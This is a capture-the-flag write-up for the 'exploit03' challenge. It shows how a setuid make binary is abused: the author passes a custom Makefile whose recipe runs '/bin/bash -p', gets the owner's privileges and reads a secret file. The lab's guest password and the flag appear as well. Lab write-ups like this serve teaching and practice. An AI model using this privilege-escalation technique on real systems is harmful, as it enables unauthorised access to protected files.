Log on as guest (password: shu1eKoo) on machine 220.127.116.11.
You will find the hidden validation key in /home/exploit03/.secret.$> ssh firstname.lastname@example.org
The goal of this challenge is to read the /home/exploit03/.secret file wich is read only for the exploit03 user, and contains the flag.
By listing the /home/exploit03/project/ directory, we can see these files :
guest@ns314076:/home/exploit03/project$ ls -la total 1704 dr-xr-xr-x 2 exploit03 exploit03 4096 Apr 30 23:47 . dr-xr-xr-x 3 exploit03 exploit03 4096 Apr 29 15:47 .. -r-sr-sr-x 1 exploit03 exploit03 549452 Apr 29 15:46 make -r--r--r-- 1 exploit03 exploit03 1176037 Apr 30 23:47 make-3.81-alpha.tar.bz2 -r--r--r-- 1 exploit03 exploit03 269 Apr 29 15:46 Makefile guest@ns314076:/home/exploit03/project$
There are three files : make, make-3.81-alpha.tar.bz2 and Makefile. The most interesting thing here is the make binary which is setuid, meaning that every time we launch this binary, we will automatically have the exploit03 rights. Pretty interesting, knowing that we have to read an exploit03’s file :).
So, with this piece of information, what can we do ? Launch the make binary ? OK, but it won’t read the .secret file. It only reads the Makefile file in order to know what to do.
It would be cool to modify the Makefile in order to insert something like… /bin/sh ? 😉
Unfortunately, the Makefile is read-only, meaning that we can’t modify it. Pretty annoying isn’t it ?
But hey wait a minute !? THIS Makefile is read-only, what about creating our own Makefile and use it instead of this useless Makefile ?
OK Let’s try this !
First, we have to man make, in order to be sure that we can use Makefile which is in another directory.
guest@ns314076:/home/exploit03/project$ man make NAME make - GNU make utility to maintain groups of programs SYNOPSIS make [ -f makefile ] [ options ] ... [ targets ] ... [...] -f file, --file=file, --makefile=FILE Use file as a makefile.
hmmm… Seems pretty good no ?! Now we just have to create a new Makefile :
guest@ns314076:/home/exploit03/project$ cd /tmp guest@ns314076:/tmp$ mkdir me guest@ns314076:/tmp$ cd me guest@ns314076:/tmp/me$ nano Makefile guest@ns314076:/tmp/me$ cat Makefile CP = /bin/cp CHMOD = /bin/chmod DIR = make-3.81-alpha .PHONY: install clean all: $(DIR)/make $(DIR)/make: /bin/bash -p
and to launch the make with this new awesome Makefile. If everything is going well, we should have a shell with exploit03 rights and read the .secret file !
guest@ns314076:/tmp/me$ /home/exploit03/project/make -f ./Makefile all /bin/bash -p bash-4.2$ cat /home/exploit03/.secret uY2Waed3ie bash-4.2$ exit exit
Perfect ! The flag of this chall is uY2Waed3ie